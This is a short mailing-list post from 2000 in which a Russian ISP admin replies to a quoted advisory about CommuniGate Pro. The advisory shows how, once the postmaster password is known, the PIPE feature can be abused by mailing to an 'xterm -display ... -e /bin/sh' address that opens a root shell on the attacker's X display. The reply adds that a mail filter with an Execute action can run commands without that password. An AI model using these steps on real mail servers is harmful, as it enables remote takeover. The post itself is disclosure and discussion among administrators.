On Tue, Jul 18, 2000 at 01:08:39PM +0600, Martin McFlySr wrote:
> 2. Remote execution of arbitrary commands as root
>
> This is not a vulnerability in itself but a demonstration of what can be
> accomplished once an attacker has obtained the postmaster password.
>
> Looking up the features of CommuniGate, we find the PIPE feature. It
> allows people to send e-mail to a program in the mail server. It's
> disabled by default, but once we can access the mail server settings using
> the postmaster password, we can just enable it, make the application
> directory be /usr/X11R6/bin/, increase the max. process execution time,
> and send an e-mail to "xterm -display 172.16.2.4:0 -e /bin/sh"@pipe
> which will open a root xterm in our desktop...
>
А еще на эту тему там фича есть, можно фильтр на прием почты сделать с
action == Execute. Я про это в четвергв RU.UNIX.BSD ляпнул...
Причем для этого совсем не нужен пароль постмастера... Правда, зато и
не факт, что комманда рутом выполняться будет :)
> Может, еще не видел кто....
Ну вот и до него добрались... А то все sendmail, sendmail :)
=============================================================================
"inet-admins" Internet access mailing list. Maintained by East Connection ISP.
Mail "unsubscribe inet-admins" to Majordomo@info.east.ru if you want to quit.
Archive is accessible on
